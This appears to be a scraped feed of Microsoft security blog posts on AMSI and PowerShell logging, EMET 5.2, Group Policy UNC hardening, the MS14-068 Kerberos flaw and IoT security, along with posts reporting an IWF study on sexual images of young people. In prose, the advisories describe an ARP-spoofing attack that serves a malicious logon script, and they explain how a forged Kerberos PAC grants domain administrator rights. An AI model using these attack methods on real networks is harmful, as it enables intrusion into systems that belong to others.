Antimalware engines traditionally focus the majority of their attention on files that applications (or the system) open. Scripts have historically been difficult for antimalware engines to evaluate because scripts can be so easily obfuscated. Unless the antimalware engine can emulate the particular scripting language, it will not be able to deobfuscate the script to view the actual payload.

A new Windows 10 feature, the Antimalware Scan Interface (AMSI), lets applications become active participants in malware defense. Applications can now request antimalware evaluation of any content – not just files on disk. This gives script engines (and other applications) the ability to request evaluation of deobfuscated scripts and to request evaluation of content entered directly in to the console.

For more information about the Antimalware Scan Interface, see


PowerShell Logging Improvements

Given the incredible power of PowerShell’s shell and scripting language, we’ve made major advancements in PowerShell’s transparency for PowerShell v5:

Improved over-the-shoulder transcription

Previous versions of PowerShell provided the ability to transcript sessions. Unfortunately, transcripting was not globally configurable, could be easily disabled, and only worked in the interactive PowerShell console. The result was that transcripting was not very practical for detecting malicious activity.

For PowerShell v5 and Windows 8.1/2012R2 with KB3000850, the following changes have been made for transcripting:

  • Can now be configured as a system-wide group policy
  • Provides better information about the session than the previous transcription functionality
  • Transcription works in both non-interactive and interactive PowerShell sessions

Deep script block logging

Previous versions of PowerShell provided “pipeline logging”, a mechanism to log all commands invoked (with the parameters). The way this information was logged made it difficult to use for security auditing and detection. In PowerShell v5 and Windows 8.1/2012R2 with KB3000850, PowerShell gains a new security focused logging mechanism called “Script Block Logging”.

A “script block” is the base level of executable code in PowerShell. Even when a script is obfuscated, it must eventually be transformed from an obfuscated script block back in to a deobfuscated script block containing its malicious payload.

PowerShell now provides the option to log all script blocks to the event log prior to executing them. In the case of obfuscated scripts, both the obfuscated and deobfuscated script blocks will end up being logged. This gives defenders the ability to see exactly what PowerShell code is being run on their systems.

Protected Event Logging

One concern when you increase logging on a machine is that the information you’ve logged may contain sensitive data. If an attacker compromises that machine, this sensitive information in the event log may be a gold mine of credentials, confidential systems, and more. To help address this concern, we’ve added Protected Event Logging to Windows 10, which lets participating applications encrypt sensitive data as they write it to the event log. You can then decrypt and process these logs once you’ve moved them to a more secure and centralized log collector.

Miscellaneous Security Improvements

Additional security features added to PowerShell v5 include:

  • Encryption and decryption cmdlets using the Cryptographic Message Syntax (CMS) standard
  • Secure code generation APIs for developers
  • “Constrained PowerShell” for systems that implement AppLocker policies


For more information about PowerShell’s transparency improvements, Protected Event Logging, and other PowerShell security improvements, see



Joe Bialek (MSRC Engineering), Lee Holmes (PowerShell)

Experts: Don’t blame the victims of youth ‘selfies’, 17 Mar 2015 19:32:52 +0000 more »]]>It’s a mistake to blame young people who take sexually explicit photos or videos of themselves when those images end up being redistributed over the Internet, according to experts who gathered in London this week to discuss a new study by the U.K.-based Internet Watch Foundation (IWF).

It’s also a mistake to assume that the images, sometimes referred to as “selfies,” were taken voluntarily by the children who appear in them.

Researchers analyzed sexually explicit pictures taken and supposedly shared by young people, and found that 89.9 percent of the images had been “harvested” from their original upload location and posted to other public sites. Moreover, 100 percent of the images the IWF analyzed depicting children 15 and younger were harvested and posted somewhere else.

The IWF study, which was conducted late last year and funded by Microsoft, analyzed 3,803 photos and videos that were believed to be of children and youth ranging from infants to 20 years old.

“What the IWF went to seek and what they found are quite different,” said Tink Palmer, Chief Executive Officer of the Marie Collins Foundation and moderator of a panel discussion about the emotional and behavioral aspects of producing such images. “We need to focus on definitions and understand that every picture tells a story about what’s happening to the children.”

Microsoft funded the IWF to repeat and expand similar research done three years ago. IWF’s 2012 study found that of the 12,000-plus images taken and shared by youth and examined by the IWF, 88.15 percent had migrated to “parasite websites” where people sometimes paid to download them. As part of our child online protection strategy, Microsoft was interested in learning whether the 2012 trend was continuing, and whether there was more to be gleaned regarding the content’s commercial availability.

What the IWF learned from the new study, however, was very different. The 2014 set of supposed selfies featured much younger children, thus making it all but impossible to refer to the images as “self-produced.” Indeed, experts agreed the latest content could be divided into three categories: (1) truly self-generated, (2) by-products of online “grooming,” and (3) results of outright coercion or “sextortion.”

“With the under 10 (year olds), we have to believe something coercive is going on,” said Professor Sonia Livingstone of the Department of Media and Communications at the London School of Economics. “It’s just another way that an already at-risk group is being further victimized.”

IWF was unable to ascertain (nor was such a determination in scope) the category into which each image might fall. The latest results are shocking and disturbing because of the younger-aged children and the heightened explicit sexual nature of the acts. In 2012, not a single image included a child believed to be 13 or younger, IWF said.

The London event, co-hosted by IWF and Microsoft, featured a second panel where experts discussed guidance for parents and educators, as well as ongoing technological efforts. The group offered advice for parents about webcams and how they operate, noting they’re no longer “a device that balances on top of a computer monitor.” They also called out simple messages for children, including “privates are private” and “speak up and tell someone” if something or someone makes them uncomfortable online or elsewhere. The event brought together 100 policymakers, child safety advocates, technology industry representatives and others to discuss the findings and to begin to chart a way forward.

All agreed the research indicated that different analyses and potential mitigation paths were required for the images involving older children versus those featuring children under 13. IWF agreed. “It is indisputable that coercion of young people to produce and/or share sexual content online must be referred to as a form of child sexual abuse,” said Sarah Smith, IWF’s lead researcher on the project. The content produced by the older age groups, meanwhile, could be regarded as more traditional “sexting.”

For our part, Microsoft will seek to create and deploy appropriate technology to help address the issue. In fact, as part of the U.K. government’s #WePROTECT Children Online initiative, Microsoft is leading a technology project about self-generated indecent images among youth. In addition, we will continue to raise awareness, help educate the public, and continue to partner with organizations like the IWF to ensure strategies and proposed “solutions” are research-based. Microsoft has agreed to again sponsor similar research by the IWF this year.

To read Part 1 of this two-part blog, which focuses on the study results and some Microsoft suggested guidance for parents, click here. To learn more about staying safer online generally, see this website.





EMET 5.2 is available (update), 16 Mar 2015 12:57:00 +0000, we’re releasing the Enhanced Mitigation Experience Toolkit (EMET) 5.2, which includes increased security protections to improve your security posture. You can download EMET 5.2 from or directly from here.

Following is the list of the main changes and improvements:

  • Control Flow Guard: EMET’s native DLLs have been compiled with Control Flow Guard (CFG). CFG is a new feature introduced in Visual Studio 2015 (and supported by Windows 8.1 and Windows 10) that helps detect and stop attempts of code hijacking. EMET native DLLs (i.e. EMET.DLL) are injected into the application process EMET protects. Since we strongly encourage 3rd party developers to recompile their application to take advantage of this very latest security technology, we have compiled EMET with CFG. More information on CFG are available at this Visual C++ Team blog entry.
  • VBScript in Attack Surface Reduction: the configuration for the Attack Surface Reduction (ASR) mitigation has been improved to stop attempts to run the VBScript extension when loaded in the Internet Explorer's Internet Zone. This would mitigate the exploitation technique known as “VBScript God Mode” observed in recent attacks.
  • Enhanced Protected Mode/Modern IE: EMET now fully supports alerting and reporting from Modern Internet Explorer, or Desktop IE with Enhanced Protected Mode mode enabled.

Your feedback is always welcome, as it helps us improve EMET. Feel free to reach out to us by sending an email to

3/16/2015 UPDATE: We have received reports of certain customers experiencing issues with EMET 5.2 in conjunction with Internet Explorer 11 on Windows 8.1. We recommend customers that downloaded EMET 5.2 before March 16th, 2015 to download it again via the link below, and to uninstall the previous EMET 5.2 before installing the new one.

– The EMET Team

Part 1: New data on youth “nudes” show disturbing trend, 10 Mar 2015 16:39:31 +0000 more »]]>Young people around the globe are taking and sharing nude photos and videos of themselves, and the phenomenon appears to be occurring among younger and younger age groups, according to results from a new study sponsored by Microsoft.

Data released today by the UK-based Internet Watch Foundation (IWF) show 17.5 percent of the more than 3,800 sexually explicit photos and videos analyzed by IWF late last year were produced by young people believed to be under the age of 15. Meanwhile, 7.5 percent, or 286 images, were assessed as featuring children 10 or younger.

Even more startling is the severity of the content. The majority (72.4 percent) of the images depicting individuals believed to be 16-20 years old was classified as “Category C,”[1] with 27.6 percent deemed “Category B or A.” In sharp contrast, 46.9 percent of the images analyzed as featuring children 15 and under constituted Category A and B.

Print“The findings tell a distinctively different story from the research conducted in 2012,” said IWF Chief Executive Officer Susie Hargreaves. “However, our message around the ease at which content can be ‘lost’ online remains the same. Ninety percent of the imagery had been taken from its original upload location and copied to somewhere else. Whilst the 2012 study provided valuable insight into the increasing accessibility of sexual content depicting young people, this research reveals younger children and in some cases more explicit sexual behavior than we previously saw.”

Indeed, 85.9 percent of the images and videos assessed as depicting youth under 15 were taken via webcam captures from a personal computer or laptop. Just 8.5 percent were taken with a mobile phone, challenging the belief that the majority of “sexting” photos are captured via cell phone. IWF reported that, among this age group, 1.8 percent of the images were shot with a traditional digital camera.

I first learned of IWF’s work analyzing “indecent self-generated imagery among youth” some 18 months ago when Microsoft was refreshing its child online protection strategy. As noted, IWF had conducted a similar study in 2012 when it reviewed more than 12,000 nude images and videos taken and shared by youth. Those results showed that 88.15 percent of the content had migrated to so-called “parasite websites” where people downloaded the images, sometimes for a fee, and in all instances probably unbeknownst to the original explicit selfie-taker. IWF stresses there was “not a single instance” three years ago where a child was assessed as being 13 years of age or younger.

We approached IWF to see if the research had been repeated or was set to be re-run. An opportunity for collaboration emerged and the current research’s photos and images were analyzed over September, October and November 2014. We asked, in particular, that IWF examine the commercial aspects of the data given the 2012 results. A piece of “good news” from the current study is that only 1.7 percent of the 2014 data-set was assessed as being “commercially available.”

Parents who may be aware of this pattern of youth behavior are often confused by it. Others are hard-pressed to believe their kids would take part. To get some perspective, we’ve produced a new factsheet and offer some general guidance:

  • Talk to kids. Ask what they do online—favorite sites, games and activities. Be inquisitive, not judgmental. Let what’s learned serve as a basis for “house rules” on technology and web use.
  • Get help from technology. Family safety settings can help block harmful content, limit information-sharing and manage website access. Tell your children if you use these features and explain they’re intended to help keep them safe.
  • Discuss sexting—even if it’s uncomfortable. Start conversations early, and talk about peer pressure to sext. Listen for signs of coercion. Discuss risks and keep perspective.

To launch the research, Microsoft and IWF are co-hosting an event today at our London offices. “Youth selfies: The real picture – New insights and a way forward,” is bringing together parents, educators, policymakers and others to hear the data and discuss possible tools and resources. In Part 2 of this two-part blog, I’ll recap the event, perspectives shared and advice given. Meantime, to learn more about online safety generally, please visit this website.

[1] IWF’s category classifications are set out in the UK Sentencing Council’s Sexual Offences Definitive Guideline. Category C is defined as no sexual activity, but a prominent focus on the naked genitalia of the individuals shown. Category B includes sexual activity shy of any actual sex act, while Category A includes sex acts and other highly graphic sexual displays.

Safer Internet Day 2015: This year, “Do 1 (More) Thing” to stay safer online, 10 Feb 2015 17:39:12 +0000 more »]]>One year ago today, Microsoft asked people across the globe to #Do1Thing to stay safer and more secure online by taking what may have been a first step toward safeguarding their digital lifestyles. Today, on Safer Internet Day 2015, we want everyone to add to last year’s pledges and #Do1MoreThing to become cyber savvy. In addition, we’re launching new interactive resources for young people on the Microsoft YouthSpark Hub to further encourage safer online habits and practices.

Our goal is to help educate, engage and inspire people to better protect themselves and others online –all rooted firmly in the spirit of the Safer Internet Day 2015 theme: “Let’s create a better Internet together.” The hope is that each person’s one (more) thing will become a long-lasting best practice that will be shared with others and, in turn, lead to an ever-increasing number of safer online behaviors. Research shows that such effects can help create safer online experiences for every individual and a more secure online ecosystem for all.

privacy_IconLast year, some of the most popular “1 Thing” pledges included positive practices such as always using a four-digit PIN (personal identification number) to lock mobile devices; promises to convert to and use “strong” passwords for all devices and accounts and trying to refrain from constant phone-checking and instead “be present” in personal interactions. This year, visitors to the new online safety section of the Microsoft YouthSpark Hub may be further inspired by other online safety tips and ideas as well. One of my favorite parts of the new website is the opening section, designed to pull young people into the site, calling on them to: “Be awesome in real life and online.” From there, youth can explore comic strips, respond to polls and quizzes, and learn interesting facts and figures.

In addition, Microsoft is proud to again help sponsor the official U.S. Safer Internet Day 2015 event being held today in California. Managed by, “Safer Internet Day 2015: Actions & Activism Toward a Better Net and World” is bringing together youth leaders, educators, policymakers, parents, Internet safety experts and representatives from the technology industry to focus not just on problems, but also on solutions for building a safer and better Internet.

When asked about this year’s theme, Larry Magid, co-director of said Safer Internet Day’s “Let’s create a better Internet together” theme “reminds us that online and mobile safety are much more than just the absence of danger, but the presence of positive actions to improve not just the Internet but the world at large. It’s also a recognition that we’re in this together. Everyone— kids, parents, young adults, seniors, corporations, organizations and governments—has a stake and a role to play in making the Internet an even better tool for empowering the world’s citizens.”

Building on its near 20-year history in online safety, Microsoft remains committed to doing its part to help grow and shape a better and safer Internet for youth and, indeed, everyone.

For more information about staying safer and more secure online, I invite you to visit this site.

MS15-011 & MS15-014: Hardening Group Policy, 10 Feb 2015 10:50:00 +0000 we are releasing MS15-011 & MS15-014 which harden group policy and address network access vulnerabilities that can be used to achieve remote code execution (RCE) in domain networks. The MS15-014 update addresses an issue in Group Policy update which can be used to disable client-side global SMB Signing requirements, bypassing an existing security feature built into the product. MS15-011 adds new functionality, hardening network file access to block access to untrusted, attacker controlled shares when Group Policy refreshes on client machines. These two updates are important improvements that will help safeguard your domain network.

What’s the risk, i.e., what’s the attack scenario?

Let’s looks at one of the typical attack scenarios as outlined in the below diagram.

This is an example of a  ‘coffee shop’ attack scenario, where an attacker would attempt to make changes to a shared network switch in a public place and can direct the client traffic an attacker-controlled system.

  1. In this scenario, the attacker has observed traffic across the switch and found that a specific machine is attempting to download a file located at the UNC path: \\\Share\Login.bat .

  2. On the attacker machine, a share is set up that exactly matches the UNC path of the file requested by the victim: \\*\Share\Login.bat.

    1. The attacker will have crafted the contents of Login.bat to execute arbitrary, malicious code on the target system. Depending on the service requesting Login.bat, this could be executed as the local user or as the SYSTEM account on the victim’s machine.

  3. The attacker then modifies the ARP table in the local switch to ensure that traffic intended for the target server is now routed through to the attacker’s machine.

  4. When the victim’s machine next requests the file, the attacker’s machine will return the malicious version of Login.bat.

    This scenario also illustrates that this attack cannot be used broadly across the internet – an attacker need to target a specific system or group of systems that request files with this unique UNC.

What were the Group Policy vulnerabilities?

An RCE vulnerability existed in how Group Policy received and applied policy data when connecting to a domain. Concurrently, a vulnerability existed whereby Group Policy could fail to retrieve valid security policy and instead apply a default, potentially less secure, group policy. This could, in turn, be used to disable the domain enforced SMB Signing policy.

What did we fix under MS15-014?

The risk of circumventing SMB Signing was fixed by correcting how Group Policy would behave when it fails to retrieve a current, valid security policy. After applying the fix, Group Policy will no longer fall back to defaults and will instead the last known good policy if a security policy retrieval fails.

What did we harden under MS15-011?

While SMB Signing safeguards against Man-In-The-Middle attacks, with the vulnerabilities like the above in Group Policy it is possible to disable it. But more importantly, SMB Client doesn’t require SMB Signing by default so it is possible to direct the domain related traffic, especially the unencrypted traffic, to attacker controlled machines and serve malicious content to the victims in response. To block this kind of attacks we added the ability to harden the UNC path access within domain network.

Universal Naming Convention (UNC) is a standardized notation that Windows uses to access file resources; in most cases these resource are located on a remote server. UNC allows the system to access files using the standard path format: \\<hostname>\<sharename>\<objectname>, for example, \\\fileshare\passwords.txt, without requiring the application or user to understand the underlying transport technology used to provide access to the file. In this way, the UNC client in Windows abstract network file technologies, such as SMB and WebDAV, behind a familiar file path syntax. UNC paths are used in Windows in everything from printers to file shares, providing an attacker a broad surface to explore and attack. To properly address this weakness in UNC, we had to improve UNC to allow a server to authenticate itself to a client, thereby allowing the client machine to trust the content coming from the target system and be protected from malicious file shares.

How did we harden it?

When an application or service attempts to access a file on a UNC path, the Multiple UNC Provider (MUP) is responsible for enumerating all installed UNC Providers and selecting one of them to satisfy all I/O requests for specified the UNC path. On a typical Windows client installation, MUP would try the Server Message Block (SMB) protocol first, but if the SMB UNC Provider is unable to establish an SMB connection to the server, then MUP would try the next UNC Provider and so on until one of them is able to establish a connection (or there are no remaining UNC providers, in which case the request would fail). 

In most scenarios, the security of the server is paramount: the server stores sensitive data, so file transfer protocols are designed in such a way that the server validates the client’s identity and performs appropriate access checks before allowing the client to read from or write to files. The trust boundary when Group Policy applies computer and/or user policies is completely reversed: the sensitive data is the client’s configuration and the remote server has the capability of changing the client’s configuration via transmission of policy files and/or scripts. When Group Policy is retrieving data from the policy server, it important that the client performs security checks to validate the server’s identity and prevent data tampering between the client and the server (in addition to the normal security checks performed by the server to validate the client’s credentials). It is also important that MUP only send requests for Group Policy files to UNC Providers that support these client-side checks, so as to prevent the checks from being bypassed when the SMB UNC provider is unable to establish a connection to the server. 

Group Policy isn’t necessarily the only service for which these extra client-side security checks are important. Any application or service that retrieves configuration data from a UNC path, and/or automatically runs programs or scripts located on UNC paths could benefit from these additional security checks. As such, we’ve added new feature, UNC Hardened Access, along with a corresponding Group Policy setting in which MUP can be configured to require additional security properties when accessing configured UNC paths. 

When UNC Hardened Access is configured, MUP starts handling UNC path requests in a slightly different manner: 

Each time MUP receives a request to create or open a file on a UNC path, it evaluates the current UNC Hardened Access Group Policy settings to determine which security properties are required for the requested UNC path. The result of this evaluation is utilized for two purposes: 

  1. MUP only considers UNC Providers that have indicated support for all of the required security properties. Any UNC Providers that do not support all of the security properties required via the UNC Hardened Access configuration for the requested UNC path will simply be skipped.

  2. Once a UNC Provider is selected by MUP, the required security properties are passed to that UNC Provider via an Extra Create Parameter (ECP). UNC Providers that opt-in to UNC Hardened Access must respect the required security properties indicated in the ECP; if the selected UNC Provider is unable to establish a connection to the server in a manner that satisfies these requirements (e.g. due to lack of server support), then the selected UNC Provider must fail the request.

Even 3rd party applications and services can take advantage of this new feature without additional code changes; simply add the necessary configuration details in Group Policy. If a UNC Provider is able to establish a connection to the specified server that meets the required security properties, then the application/service will be able to open handles as normal; if not, opening handles would fail, thus preventing insecure access to the remote server.

Please refer to for details on configuring the UNC Hardened Access feature.

Consider the following scenario:

  • Contoso maintains an Active Directory domain named with two Domain Controllers (DCs) named and

  • A laptop is joined to the aforementioned domain.

  • Group Policy is configured to apply a Group Policy Object (GPO) to the laptop that configures UNC Hardened Access for the paths \\*\NETLOGON and \\*\SYSVOL such that all access to these paths require both Mutual Authentication and Integrity.

  • Group Policy is configured to apply a GPO to the laptop that runs the script located at \\\NETLOGON\logon.cmd each time a user logs on to the machine.


With the above configuration, when a user successfully logs onto the laptop and the laptop has any network access, Group Policy will attempt to run the script located at \\\NETLOGON\logon.cmd, but behind the scenes, MUP would only allow the script to be run if the file could be opened and transmitted securely:

  1. MUP receives a request to open the file at \\\NETLOGON\logon.cmd.

  2. MUP notices that the requested path matches \\*\NETLOGON and paths that match \\*\NETLOGON are configured to require both Mutual Authentication and Integrity. UNC Providers that do not support UNC Hardened Access or indicate that they do not support both Mutual Authentication and Integrity are skipped.

  3. The Distributed File Server Namespace (DFS-N) client detects that the requested UNC path is a domain DFS-N namespace and begins its process of rewriting the UNC path (all DFS-N requests will be subject to the same security property requirements identified by MUP in step 2):

    1. The DFS-N client uses the DC Locator service and/or DFS-N DC Referral requests (depending on the OS version) to identify the name of a DC on the domain (e.g.

    2. DFS rewrites the path using the selected DC (e.g. \\\NETLOGON\logon.cmd becomes \\\NETLOGON\logon.cmd). Since Mutual Authentication is required and the target is expected to be a DC, DFS utilizes a special Kerberos Service Principal Name (SPN) to verify that the name retrieved in the previous step is indeed the name of a DC (if the name is not a DC, Kerberos authentication would fail due to an unknown SPN)

    3. If there are additional DFS-N links in the specified UNC path, the DFS-N client continues iterating and replacing paths to DFS-N links with paths to available targets until it has a UNC path that does not have any remaining DFS-N links.

  4. The final UNC path is passed back to MUP to select a UNC Provider to handle the request. MUP selects the SMB UNC provider since DCs utilize SMB to share the NETLOGON and SYSVOL shares.

  5. The SMB UNC Provider establishes an authenticated session with the selected SMB Server (if an authenticated session is not already present). If the authenticated session is not mutually authenticated (e.g. authentication was performed utilizing the NTLM protocol), then SMB UNC Provider would fail the request to open logon.cmd since mutual authentication requirement identified in step 2 could not be met.

  6. The SMB UNC Provider enables SMB Signing on all requests related to logon.cmd since MUP informed SMB that integrity is required for this request. Any attempts to tamper with the SMB requests or responses would invalidate the signatures on the requests/responses, thus allowing the receiving end to detect the unauthorized modifications and fail the SMB requests.

In this scenario, the client-side requirement of end-to-end mutual authentication and integrity protects the laptop from running a logon script located on a malicious server via the following security checks:

  • The requirement for Mutual Authentication ensures that the connection is not redirected to an unexpected (and potentially malicious) SMB Server when SMB Client attempts to establish a connection to the requested UNC path.

  • The requirement for Integrity enables SMB Signing, even if the SMB Client does not require SMB Signing for all paths by default. This protects the system against on-the-wire tampering that can be used to change the contents of the logon.cmd script as it is transmitted between the selected DC and the laptop.

  • The combined requirements for both Mutual Authentication and Integrity ensures that the final rewritten path selected by DFS-N Client matches a path allowed by the DFS-N namespace configuration and that spoofing and/or tampering attacks cannot cause DFS-N client to rewrite the requested UNC path to a UNC path hosted by an unexpected (and potentially malicious) server.

Without these client-side protections, ARP, DNS, DFS-N, or SMB requests sent via Group Policy over untrusted networks could potentially cause the Group Policy service to run a the logon.cmd script from the wrong SMB Server.

How do I configure to protect myself/my users?

Once the update included as part of the bulletin MS15-011 is installed, follow the instructions at to ensure your systems are adequately protected. MS15-014 will install and provide protection without any additional configuration.

Please note that the Offline Files feature is not available on paths for which the UNC Hardened Access feature is enabled. 

A word on CVD and fixing difficult problems

In many regards, this security ‘fix’ is more accurately described as completely new functionality in Windows. Adding something of this scale posed a unique challenge to security response. Software vulnerabilities are typically more narrowly constrained in both investigation and remediation – and most response is structured to address that scope. Among the benefits of Coordinated Vulnerability Disclosure (CVD) is it provides for greater flexibility and deeper collaboration with researchers to take the necessary time and perspective to deliver the most complete security solutions to customers. In this case we tackled a vulnerability that required a much greater scope in engineering to deliver a solution.

Most vulnerabilities reported to the MSRC are bugs in a single component, which are investigated, understood, and fixed within industry accepted response times. Creating the new functionality of UNC Hardening, however, required an entirely new architecture which increased development time and necessitated extensive testing. Thanks to CVD, and the close collaboration with the passionate security researchers who reported the vulnerability, Microsoft had sufficient time to build the right fix for a complicated issue. If the security researchers were not willing to refrain from disclosure until our fix was ready, customers would have been put at risk.


Microsoft offers its appreciation to the CVD community and a special thanks to the reporters of the issue which has resulted in UNC Hardening: Jeff Schmidt of JAS Global Advisors, Dr. Arnoldo Muller-Molina of simMachines, The Internet Corporation for Assigned Names and Numbers (ICANN) and Luke Jennings from MWR Labs.


  • Geoffrey Antos (Windows), Brandon Caldwell (MSRC), Stephen Finnigan (MSRC), Swamy Gangadhara (MSRC)

Please note that the Offline Files feature is not available on paths for which the UNC Hardened Access feature is enabled.

New Version of BinScope Binary Analyzer, 20 Nov 2014 19:50:11 +0000 more »]]>We are delighted to announce the availability of an updated version of the BinScope Binary Analyzer, Microsoft BinScope version 2014. BinScope is a tool used during the Security Development Lifecycle (SDL) verification phase. It is available as a free download from the Microsoft Download Center here.

BinScope was designed to help detect potential vulnerabilities that can be introduced into Binary files. The checks it implements examine application binary files to identify coding and build practices that can potentially render the application vulnerable to attack or to being used as an exploit attack vector.

The specific changes in BinScope 2014 Update include:

  • Correctly handles CompilerWarningsCheck with the use of –W4 on the command line.
  • Correctly processes the warning levels which are explicitly enabled from the command line.
  • The __declspec(safebuffers) check no longer fires on GsDriverEntry for x86 drivers.
  • ATL version check now fails on known bad ATL headers only; no longer produces failures on unknown ATL headers.
  • Removed deprecated switches from showing as part of /?.
  • Allows new-line delimited file lists getting parsed as response files.

BinScope 2014 Update is inclusive of all the improvements that were part of BinScope 2014, such as:

Improved Diagnostic Messages

A key focus for BinScope 2014 was to ensure that diagnostic messages are clear and actionable for engineers when a potential vulnerability is detected. We believe that being able to quickly understand not only the potential issue but its mitigation is key.

New Minimum Compiler and Minimum Linker Version Switch

By default, BinScope 2014’s CompilerVersionCheck adheres to the compiler and linker versions defined in the SDL guidance. However, we recognize that compiler and linker versions will evolve over time, as a result two new command line switches were added. These switches, known as /MinimumCompilerVersion and /MinimumLinkerVersion, provide the ability to adjust the minimum linker and compiler versions that BinScope will detect when running the CompilerVersionCheck.

Increased Performance

Another important focus for us was to improve the performance of BinScope when executing a scan, particularly with large binaries. As a result, we have been able to improve the scanning performance of BinScope by up to 4 times.

Other changes in BinScope 2014 include:

  • Removal of the Graphical User Interface (GUI).
  • Removal of directory scanning, instead individual binary paths should be provided.
  • General bug fixes.

For more information and additional resources, visit:

Additional information about CVE-2014-6324, 18 Nov 2014 10:17:42 +0000

Today Microsoft released update MS14-068 to address CVE-2014-6324, a Windows Kerberos implementation elevation of privilege vulnerability that is being exploited in-the-wild in limited, targeted attacks. The goal of this blog post is to provide additional information about the vulnerability, update priority, and detection guidance for defenders. Microsoft recommends customers apply this update to their domain controllers as quickly as possible.

Vulnerability Details

CVE-2014-6324 allows remote elevation of privilege in domains running Windows domain controllers. An attacker with the credentials of any domain user can elevate their privileges to that of any other account on the domain (including domain administrator accounts).

The exploit found in-the-wild targeted a vulnerable code path in domain controllers running on Windows Server 2008R2 and below. Microsoft has determined that domain controllers running 2012 and above are vulnerable to a related attack, but it would be significantly more difficult to exploit. Non-domain controllers running all versions of Windows are receiving a “defense in depth” update but are not vulnerable to this issue.

Before talking about the specific vulnerability, it will be useful to have a basic understanding of how Kerberos works.


One point not illustrated in the diagram above is that both the TGT and Service Ticket contain a blob of data called the PAC (Privilege Attribute Certificate). A PAC contains (among other things):

  • The user’s domain SID
  • The security groups the user is a member of


When a user first requests a TGT from the KDC, the KDC puts a PAC (containing the user’s security information) into the TGT. The KDC signs the PAC so it cannot be tampered with. When the user requests a Service Ticket, they use their TGT to authenticate to the KDC. The KDC validates the signature of the PAC contained in the TGT and copies the PAC into the Service Ticket being created.

When the user authenticates to a service, the service validates the signature of the PAC and uses the data in the PAC to create a logon token for the user. As an example, if the PAC has a valid signature and indicates that “Sue” is a member of the “Domain Admins” security group, the logon token created for “Sue” will be a member of the “Domain Admins” group.

CVE-2014-6324 fixes an issue in the way Windows Kerberos validates the PAC in Kerberos tickets. Prior to the update it was possible for an attacker to forge a PAC that the Kerberos KDC would incorrectly validate. This allows an attacker to remotely elevate their privilege against remote servers from an unprivileged authenticated user to a domain administrator.


Update Priority

  1. Domain controllers running Windows Server 2008R2 and below
  2. Domain controllers running Windows Server 2012 and higher
  3. All other systems running any version of Windows


Detection Guidance

Companies currently collecting event logs from their domain controllers may be able to detect signs of exploitation pre-update. Please note that this logging will only catch known exploits; there are known methods to write exploits that will bypass this logging.


The key piece of information to note in this log entry is that the “Security ID” and “Account Name” fields do not match even though they should. In the screenshot above, the user account “nonadmin” used this exploit to elevate privileges to “TESTLAB\Administrator”.

After installing the update, for Windows 2008R2 and above, the 4769 Kerberos Service Ticket Operation event log can be used to detect attackers attempting to exploit this vulnerability. This is a high volume event, so it is advisable to only log failures (this will significantly reduce the number of events generated).


After installing the update, exploitation attempts will result in the “Failure Code” of “0xf” being logged. Note that this error code can also be logged in other extremely rare circumstances. So, while there is a chance that this event log could be generated in non-malicious scenarios, there is a high probability that an exploitation attempt is the cause of the event.



The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain. An attacker with administrative privilege on a domain controller can make a nearly unbounded number of changes to the system that can allow the attacker to persist their access long after the update has been installed. Therefore it is critical to install the update immediately.


Additional Notes

Azure Active Directory does not expose Kerberos over any external interface and is therefore not affected by this vulnerability.


Joe Bialek, MSRC Engineering

IoT Security Does Not Have to be an Oxymoron – Part 2, 10 Nov 2014 17:03:55 +0000 more »]]>As my colleague Kevin Sullivan wrote in part 1 of this two-part series, the Internet of Things (IoT) holds great promise for organizations and consumers. But like many new technologies, it brings with it a number of security and privacy challenges. The industry can work to help address many of these challenges by building on some of the lessons learned from decades of experience connecting traditional computing devices to the Internet, as well as understanding the unique challenges that the IoT presents.

Among those unique challenges is the diversity of devices encompassing the IoT, that range from very simple devices that only transmit data, to complex devices with processors and sophisticated software. Before millions or billions of these devices are deployed across the world, some security and privacy fundamentals need to be carefully considered including:

  • Insecure design: Some of the early IoT devices I have seen in the market today have not been designed with security in mind. Some of these devices lack basic security capabilities, while others have security capabilities, but they are inappropriate for all the scenarios that the device can be used in. It’s also easy to imagine that some IoT devices have been released with insecure default settings.
  • Disclosure of personal information: When devices, sensors, appliances, etc., are connected to the Internet (or when physically accessible), it can raise concerns that everyday activities, preferences, and sensitive information, could be monitored and disclosed without proper authorization. Additional concerns arise with the possibility that data gathered from IoT devices could be correlated with other sources of data and used for purposes, such as the creation of self-learning autonomous systems, without the appropriate consent from the data owner.
  • Limited ability to receive updates and change configurations: Keeping systems up-to-date with security updates is one of the most effective security practices today. As vulnerabilities are discovered and attackers attempt to exploit them, it’s critically important that vendors have a well thought through response plan and the capability to update and reconfigure systems to mitigate these attacks. Not all IoT devices are going to be the same. Different devices are going to have different hardware and software, and subsequently different capabilities. Some devices might have limited update capabilities or might not even have an operating system. What’s the plan to update a t sensor that doesn’t have a full operating system installed on it? This type of requirement needs careful consideration.
  • Insecure data: How IoT devices store and transmit data is another important consideration. Securing data communications, including authentication, and encrypting data at rest, have become common expectations for systems today. The ability to manage settings for such security features is also a common expectation. Many IoT devices might be connected to networks that are themselves insecure making how well these devices protect data in untrusted or hostile environments a consideration.

What should industry do to help address security and privacy related to IoT? Building software with security in mind during every phase of development has proven to be very effective – something that can inform the development process for IoT devices as well. Among the unique challenges for the IoT is the diversity of devices encompassing the IoT, which range from very simple devices that only transmit data, to complex devices with processors and sophisticated software. Broadly applicable design considerations should include:

  • Secure by design, secure in development and secure in deployment (SD3): This is the same mantra we started in Trustworthy Computing at Microsoft many years ago. IoT devices and services should be designed and developed in manner that improves security and privacy during the lifecycle of the device by applying secure software development processes such as Microsoft’s Security Development Lifecycle.
  • Secure communications: Presumably, in the future many IoT devices will operate on the public Internet or on other networks where they may face a variety of threats to data confidentiality. IoT devices and services should utilize strong encryption techniques to protect data, and networks should use the latest communication protocols and up-to-date security architecture. On IoT devices that host third-party applications, the security of these communications needs to be addressed as well. Some more primitive IoT devices will lack the ability to perform encryption themselves. In such cases, one possible solution would be to design the device to allow its data to be encrypted by an intermediary gateway device on the local network before the data is sent over the Internet.
  • Manageability and security updates: Many IoT devices will likely be built for single purpose applications and will have limited input/output capabilities to manage the device. IoT devices need to be designed to apply important functionality and security updates, preferably with the option of automatic updates requiring little or no administrator interaction. Devices should be designed to respond to security issues impacting devices, services, or applications. Awareness of the security or privacy issues related to other services and devices with dependencies should also be accounted for in update planning. IoT devices lacking the physical requirements for manageability and updates should be designed to allow security management by an intermediary gateway device on the local network before the data is sent over the Internet – as one possible solution.
